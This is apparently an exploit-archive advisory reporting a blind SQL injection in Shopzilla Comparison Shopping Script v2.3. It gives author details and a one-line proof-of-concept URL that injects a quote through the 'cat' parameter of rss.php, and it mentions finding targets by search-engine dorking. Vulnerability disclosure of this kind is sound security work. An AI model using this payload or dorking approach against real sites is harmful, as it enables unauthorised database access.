============================================================================================
| # Title : shopzilla Comparison Shopping Script v2.3 Blind SQl injection vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version : v2.3
| # Vendor : http://www.bizrate-partner.com/
| # Dork : n/a
=============================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
http://127.0.0.1/shopzilla/rss.php?cat=1%27 <=====( inject her )
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================